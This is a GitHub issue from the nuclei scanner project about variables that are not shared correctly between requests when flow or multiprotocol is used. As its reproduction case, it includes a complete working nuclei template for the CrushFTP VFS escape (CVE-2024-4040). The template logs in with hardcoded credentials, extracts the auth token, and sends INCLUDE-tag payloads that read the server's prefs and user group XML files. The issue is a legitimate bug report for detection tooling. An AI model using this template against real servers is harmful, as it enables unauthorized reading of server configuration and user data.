### ISSUE TITLE
incorrect variable sharing with templateCtx in flow & Multiprotocol

### ISSUE THREAD

**Issue by tarunKoyalwar** [projectdiscovery/nuclei#5095]
### Nuclei version:

main | latest

### Current Behavior:

- when using flow or multiprotocol if there are 3 or more requests in a pariticular http protocol block , the values are not shared properly and are reset on 3rd requests. basically history of request variables is reset after 2 requests 

```yaml
id: CVE-2024-4040

info:
  name: CrushFTP VFS escape
  author: DhiyaneshDK
  severity: high
  description: Check connectivity and response from specific endpoint.
  reference:
    - https://www.bleepingcomputer.com/news/security/crushftp-warns-users-to-patch-exploited-zero-day-immediately/
    - https://www.crushftp.com/crush10wiki/Wiki.jsp?page=Update
    - https://www.crushftp.com/crush11wiki/Wiki.jsp?page=Update
    - https://www.reddit.com/r/crowdstrike/comments/1c88788/situational_awareness_20240419_crushftp_virtual/
    - https://www.reddit.com/r/cybersecurity/comments/1c850i2/all_versions_of_crush_ftp_are_vulnerable/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 7.7
    cve-id: CVE-2024-4040
    cwe-id: CWE-20

flow: http()
http:
  - raw:
      - | 
        GET /WebInterface/ HTTP/1.1
        Host: {{Hostname}}


      - |
        POST /WebInterface/function/ HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 111
        Origin: {{RootURL}}
        Referer: http://{{RootURL}}/WebInterface/login.html
        
        command=login&username={{username}}&password={{password}}&encoded=true&language=en&random=0.34712915617878926

      - |
        POST /WebInterface/function/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        user_ip: 127.0.0.1

        command=exists&random=0.34712915617878926&paths={{paths}}&c2f={{auth}}

    attack: pitchfork
    payloads:
      username:
        - crushadmin
      password:
        - MyyXX0K9pCzXg5pt
      paths:
        - "%3CINCLUDE%3Eprefs.XML%3C%2FINCLUDE%3E"
        - "%3CINCLUDE%3Eusers%2FMainUsers%2Fgroups.XML%3C%2FINCLUDE%3E"  

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - "<response>success</response>"

      - type: word
        part: body_3
        words:
          - "<server_prefs"
          - "<groups"
        condition: or  

      - type: word
        part: header
        words:
          - "text/xml"

    extractors:
      - type: regex
        name: auth
        internal: true
        part: header_2
        group: 1
        regex:
          - 'currentAuth=([0-9a-zA-Z]+)'
```

^ use `-v -svd` and see that on last requests header_2 , header_1 and other vars of 1 & 2 are not available 
but if we remove flow those are available

### Expected Behavior:

- no inconsistency

### Proposed Solution

- We are using a map of map in ExecuterOptions to store all templateCtx variables of a particular template which is not the best way to do it , and we should use ScanContext instead which should take care of such issues in clean way along with context cancellation support upto http request level
